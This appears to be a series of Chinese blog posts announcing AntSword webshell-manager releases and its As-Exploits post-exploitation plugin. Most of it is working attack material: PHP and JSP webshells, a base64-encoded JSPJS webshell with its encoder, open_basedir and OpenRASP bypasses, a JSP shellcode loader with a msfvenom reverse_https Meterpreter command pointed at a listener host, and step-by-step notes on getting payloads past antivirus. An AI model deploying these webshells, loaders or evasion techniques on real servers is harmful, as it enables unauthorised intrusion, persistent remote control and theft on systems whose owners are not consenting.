  平时见到的 Exp 大家都喜欢直接发命令执行的 Exp （没错我说的就是 struts2 全家桶）。一直以来，有个想法，能不能图形化管理命令执行的WebShell，于是他来了。

本来是要在下个版本更新的时候再发文章的，实在没忍住，提前发出来了。

正文

比如我们有这么一个 PHP 的 Shell:

<?php system($_POST['ant']);?>

或者是这样一个再普通不过的 JSP WebShell

<%  if(request.getParameter("cmd")!=null){    java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c",request.getParameter("cmd")}).getInputStream();    int a = -1;    byte[] b = new byte[1];    out.print("<pre>");    while((a=in.read(b))!=-1){      out.print(new String(b));    }    out.print("</pre>");  }%>

这里得提一嘴, JSP 下用 Runtime.exec 方法时，如果是直接传 Stirng 进去，只能执行一条命令，后面的内容都会当作参数来处理，所以我们在这里使用的是数组。并且在读取命令执行结果时，用 byte 数组的形式的话，得注意内容覆写的问题，别问我为什么这个 WebShell 是这么低效率的，我就是随便找了一个.

再或者是 Struts2 RCE 的 EXP, 或者是 Flask SSTI...

只要有一个可以执行命令的点, 就可以快乐起来 :)

写在最后

    想要尝鲜的小伙伴可以切换到 v2.1.x 开发分支体验，欢迎大家反馈 Bug，正式版将在下个月也可能是下下个月发布，如果到时候能把 Windows 下的也解决了就一起发布了。

不如关注一波再走？

阅读原文

跳转微信打开

给领导们汇报一下 v2.1.13 的更新情况，新增了一个新的JSP类型，更新了一波插件，修了一些Bug。

写在前面

    给领导们汇报一下 v2.1.13 的更新情况，新增了一个新的JSP类型，更新了一波插件，修了一些Bug。

核心

• ❗️❗️❗️新增 JSPJS Shell 类型 (Author: @yzddMr6)

基于 Java 内置的 JS 引擎来实现的 JSP 一句话类型, jdk >= 6

相较于 jsp defineClass 实现，该方式的数据包大小明显小了不少

设计思路请参考 Mr6 的文章: 《一种新型Java一句话木马的实现 》(https://xz.aliyun.com/t/9715)

值得一提的是，JSPJS 类型可以通过「迂回」的方式去「直接使用」原来的 JSP 类型 WebShell, 留给大家去探索了

请耐心看完下面的 Note

目前该类型默认生成的 WebShell 如下:

<%  try {    javax.script.ScriptEngine engine = new javax.script.ScriptEngineManager().getEngineByName("js");    engine.put("request", request);    engine.put("response", response);    engine.eval(request.getParameter("ant"));  } catch (Exception e) {    out.println("Error:// "+e.toString());  }%>

从WebShell代码上就能看出来，在流量层上和 PHP 最基础的WebShell <?php eval($_POST['ant']);?> 一样具有明显特征，不建议直接使用, 请配合自定义编码器进行:

eg:  b64pass 编码器

// b64pass 编码器'use strict';module.exports = (pwd, data) => {  data[pwd] = Buffer.from(data['_']).toString('base64');  delete data['_'];  return data;}

对应 WebShell 如下:

<%!public byte[] base64Decode(String str) throws Exception {  Class base64;  byte[] value = null;  try {    base64=Class.forName("sun.misc.BASE64Decoder");    Object decoder = base64.newInstance();    value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });  } catch (Exception e) {    try {      base64=Class.forName("java.util.Base64");      Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);      value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });    } catch (Exception ee) {}  }  return value;}%><%  try {    javax.script.ScriptEngine engine = new javax.script.ScriptEngineManager().getEngineByName("js");    engine.put("request", request);    engine.put("response", response);    engine.eval(new String(base64Decode(request.getParameter("ant"))));  } catch (Exception e) {    out.println("Error:// "+e.toString());  }%>

请自行对照最基础的 WebShell 样例自由发挥，再多的就不需要我再说了吧 :)

• ❗️PHP/PHP4 类型增加 Bypass open_basedir (自动尝试)

利用的是 chdir('..'); 的方式, 仅会在目标配置了 open_basedir 时才会自动尝试。使用时无感知，如果是插件开发者，需要判断 open_basedir 的值是不是 / , 当然也会影响当前所在目录

该功能会影响v0.13之前版本 PHP Bypass DisableFunction 插件, 请及时更新插件

虚拟终端

• 虚拟终端显示文字样式调亮(thx @Nearg1e 帮我们暗中收集调研了一波需求)

• 终端执行命令路径分割符由固定的 [S][E] 改为随机字符串

别问, 要问就去问 Windows Defender

数据管理

• 开启代理情况下在数据管理状态栏会有提示

• 修复 multipart 发包方式下, 编码器中 data 内容不为字符串时异常

eg:

'use strict';module.exports = (pwd, data) => {  data['test'] = 123; // 这里会引发异常  data[pwd] = data['_'];  delete data['_'];  return data;}

插件相关

请及时更新相关插件

• ExecuteScript 支持 JSPJS 类型

• GenShell 支持 JSPJS 类型 Shell 生成

• Bypass disable_function

• 修正 bypass open_basedir 场景下上传路径问题

• .antproxy.php 上传至与 Webshell 同路径下

• php -S 利用方式会在界面显示开启的临时端口

• PortScan 支持 JSPJS 类型

• Out-of-Network 支持 JSPJS 类型

写在最后

没了，有新版就快更新吧

不如关注一波再走？

阅读原文

跳转微信打开

震惊！神秘插件，竟增添了如此功能。。。

更新主要内容

注：需要将蚁剑更新至v2.1.12

v 1.3 (2021/5/14)

• equals支持数组传参方式，兼容各种容器

• jsp新增 ShellCode加载器模块，内置两种分别基于jna跟java agent的shellcode加载方式

• jsp新增 Bypass OpenRASP 模块，thx@Godzilla

• JarLoader模块 新增手动上传方式，解决因Tomcat最大POST长度为2m导致无法加载内存Jar的问题

• reGeorg内存马改为更稳定的neo-reGerog，默认密码：asexploits

• 冰蝎内存马支持3.7，去除pageContext依赖，兼容Spring等容器

• 各模块兼容JDK5

挑几个重点的说说

Shell入口参数支持数组形式

Shell入口参数即下面new Object[]{request,response}的部分。

<%    String cls = request.getParameter("ant");    if (cls != null) {        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});    }%>

至于为什么要改这个玩意要从内存马的兼容说起。

除了由于写法问题而导致的各种乱七八糟的问题以外，连接内存马的一个主要问题是冰蝎在入口处采用了pageContext这个类来获取request response session对象。但是以filter型内存马为例，doFilter中三个参数分别是ServletRequest，ServletResponse，FilterChain，并不存在pageContext这个东西，并且在SpringBoot这种容器里根本没有pageContext这个类。

于是就有很多师傅提出了自己的解决办法，大体分为三种：

1. 自己声明一个pageContext类，在里面实现对应的request跟response的getter setter。冰蝎改造之不改动客户端=>内存马。

2. 改写冰蝎的入口为request+response，不再采用pageContext作为入口。但是弊端就是不能再用equals了，要重新写一个方法用反射调用。冰蝎改造之适配基于tomcat Filter的无文件webshell - 先知社区 (aliyun.com)

3. 采用蚁剑原来的Custom模式，把恶意函数直接通过字节码打进去，然后通过方法名调用。不过由于直接编译恶意函数的字节码较大会超过最大长度限制，一般要先写入目标然后配合URLClassLoader才能使用。使用WebLogic CVE-2020-2883配合Shiro rememberMe反序列化一键注入蚁剑shell - 先知社区 (aliyun.com)

以上的这些方法可以是可以，但是不够优雅。

回想我们最开始的问题，为什么要用pageContext，是为了拿到当前请求的上下文，更精确一点就是输入输出：request,response。request是接收参数，response是回显，两者缺一不可。

后来自己调试的时候发现在request中本身就包含了当前的response，同样response中也包含了当前的request。

当时就想着我shell中传个request，然后在payload里面利用反射把requst里面的response取出来，或者response里面的request取出来不就完事了？

这样确实可以，在2020年9月4日，勤劳的我一大早就起来写了一波代码，然后发了上去，commit记录可以证明我没有瞎bb。当时蚁剑算是最早兼容内存马的。

因为Tomcat喜欢用门面模式，所以要反射两层，结果后来发现在WebLogic下用不了了，因为WebLogic不喜欢搞门面模式，只需要反射一层就够了。

行吧，那我就再加一种情况，在JSP V1.4版本又增加了一层反射的情况。

本来以为没事了，后来又发现在有shiro的情况下打一个servlet内存马进去，这时候去连接内存马需要反射三次？？

WTF？？？

然后意识到，这种case by case的解决方式是不行的，世界上还有那么多种Web容器中间件，不可能一个一个去调吧。

所以为了彻底解决这个问题，在520师傅的建议下采用了数组的方式将两者直接传进去，把分析的逻辑放在打内存Shell的时候去做，而不在payload里面去做。

现在冰蝎跟哥斯拉也都有了相应的机制，思路大体是一样的，感兴趣的小伙伴可以自己研究一下。

JarLoader模块新增手动上传方式

内存加载

直接通过HTTP包将Jar打入目标内存，仅需选择本地需要上传的Jar文件即可，期间文件不落地。但是Tomcat默认POST最大上传大小为2M，如果超过了此大小请选择手动上传模式。

手动上传

先手动将Jar上传到目标服务器上，然后通过路径加载。

JSP ShellCode加载器

内置两种加载方式，使用之前请务必认真阅读使用说明，否则可能直接将Java进程打挂。

需要注意两点：

• 使用MSF需要加上PrependMigrate=true PrependMigrateProc=xxxx.exe参数，自动迁移到新的进程，否则会在migrate/exit的时候把Java进程给干掉，导致网站瘫痪。例如：

• msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.88.129 LPORT=8888  PrependMigrate=true PrependMigrateProc=svchost.exe -f hex

• JNA方式只需要X86类型的ShellCode即可，而Attach方式需要根据目标Java位数来选择对应的ShellCode。

JNA方式

利用第三方库JNA进行ShellCode的加载。

适用范围：JDK>=1.5

正确操作

1. 首先利用Jar加载器将ShellCodeLoader.jar上传到目标服务器目录并加载。

2. 使用MSF或者CS生成x86类型的shellcode，并开启监听。

3. 在ShellCode加载器模块，输入hex或者java格式的shellcode，且不能有多余换行跟空格。

4. 点击exploit，等待返回回话。

JNA方式测试

装了360，火绒，电脑管家

上传插件ext目录下的ShellcodeLoader.jar到目标服务器，然后复制文件路径

手动加载到JVM中

MSF生成Shellcode

选择JNA方式，exploit!

直接上线，杀软没有拦截

关于jna会生成一个临时文件的问题，发现确实会生成一个dll临时文件在Tomcat临时目录下

但是扫了一下发现是免杀的

VT检测结果0/68，也就是说落地也问题不大。

不过可能这篇文章出来之后就没了

Attach

模拟java agent注入过程来实现Shellcode的加载。这个native方法是jdk自带的，并且经过oracle签名的，理论上免杀效果更好。

适用范围：JDK>=1.6

正确操作

1. 基本信息，exploit，Ctrl+F 搜索 sun.arch.data.model，查看java位数

2. 根据java位数生成对应位数的shellcode，并开启监听。

3. 在ShellCode加载器模块，输入hex或者java格式的shellcode，且不能有多余换行跟空格。

4. 点击exploit，等待返回回话。

Attach方式测试

发现是64位java

CS生成对应位数的shellcode，选择java格式导出。

粘贴到插件中，在exploit的一刻会自动格式化为hex

直接上线，杀软没有拦截。

一键Bypass OpenRASP

借鉴自哥斯拉的插件：Godzilla-BypassOpenRasp

一键绕过OpenRASP

目标安装有OpenRASP且开启命令执行拦截

exploit!

再次运行，即可执行命令

其他

• reGeorg内存马改为更稳定的neo-reGerog，默认密码：asexploits

• 冰蝎内存马去除pageContext依赖，兼容Spring等容器

• 各模块兼容JDK5

项目地址

https://github.com/yzddmr6/As-Exploits

来颗star吧~

阅读原文

跳转微信打开

水一下，嫖了西湖论剑的一个展位，讲解什么的，Mr6是主力，我打打杂。本来想做一批贴纸的，月亮师傅加班加点都设计出来了，可惜时间太紧了，没印，所以提前发出来让大伙瞅瞅。以后有机会再着手印一批周边。

跳转微信打开

antSword 后渗透模块，一个你不能错过的插件。本文将介绍 v1.2 更新内容，并介绍该插件目前已有的功能。

前言

As-Exploits，中国蚁剑后渗透模块。本文将介绍 v1.2 更新内容，并介绍该插件目前已有的功能。

  目前插件的定位是蚁剑的一个微内核拓展模块，可以迅速做到 Payload 的工程化，不用过多时间浪费在插件的结构上。目前的As-Exlpoits各部分之间基本做到了解耦，新增一个payload只需要两步：1. 填写payload，2. 画一个表单。其余发包，回显处理等事情框架会自动帮你实现。想要自定义的话只需要继承父类然后重写对应方法即可。

其中Payload部分很多借鉴了冰蝎跟哥斯拉的实现，向其开发者们表示感谢！

支持列表

V1.2 更新主要内容

1) aspx增加屏幕截图模块

我打我自己

当然实战中需要较高权限。

因为在Jscript加载Assembly踩坑记里面解决了Jscript加载c#的问题，所以C#的payload理论上都可以加进去，更多其他的用法就看大家自己发挥了

2) jsp增加Jar加载器模块

打一个jar进去通常有两个用处：

一是可以用来上传数据库驱动。

二是把恶意类打入JVM中，后续只需要通过反射调用即可。哥斯拉的实现方式就是第一次就把所有的 Payload 打入 jvm 中，后续通过反射调用。所以后续通信的流量包都非常的小，只需要传递参数即可。

冰蝎跟哥斯拉都有类似的功能，研究了一下他们的实现。

冰蝎

冰蝎的加载jar功能内嵌于数据库连接部分，仅用于上传数据库驱动。首先把要打入的jdbc上传到目标的临时目录，然后再用URLClassLoader去加载，这里贴一下代码。

net.rebeyond.behinder.ui.controller.DatabaseViewController#loadDriver

  private void loadDriver(String scriptType, String databaseType) throws Exception {      String driverPath = "net/rebeyond/behinder/resource/driver/";      Platform.runLater(() -> {         this.statusLabel.setText("正在上传数据库驱动……");      });      String os = this.currentShellService.shellEntity.getString("os").toLowerCase();      //根据系统型号选择临时目录      String remoteDir = os.indexOf("windows") >= 0 ? "c:/windows/temp/" : "/tmp/";      String libName = null;      if (scriptType.equals("jsp")) { //根据类型选择数据库jdbc         if (databaseType.equals("sqlserver")) {            libName = "sqljdbc41.jar";         } else if (databaseType.equals("mysql")) {            libName = "mysql-connector-java-5.1.36.jar";         } else if (databaseType.equals("oracle")) {            libName = "ojdbc5.jar";         }      } else if (scriptType.equals("aspx")) {         if (databaseType.equals("mysql")) {            libName = "mysql.data.dll";         } else if (databaseType.equals("oracle")) {            libName = "Oracle.ManagedDataAccess.dll";         }      }      byte[] driverFileContent = Utils.getResourceData(driverPath + libName);      String remotePath = remoteDir + libName;      //将jar先上传到临时目录      this.currentShellService.uploadFile(remotePath, driverFileContent, true);      Platform.runLater(() -> {         this.statusLabel.setText("驱动上传成功，正在加载驱动……");      });      //将libPath传递给服务端加载      JSONObject loadRes = this.currentShellService.loadJar(remotePath);      if (loadRes.getString("status").equals("fail")) {         throw new Exception("驱动加载失败:" + loadRes.getString("msg"));      } else {         Platform.runLater(() -> {            if (scriptType.equals("jsp")) {               this.statusLabel.setText("驱动加载成功，请再次点击“连接”。");            }            this.statusLabel.setText("驱动加载成功。");         });      }   }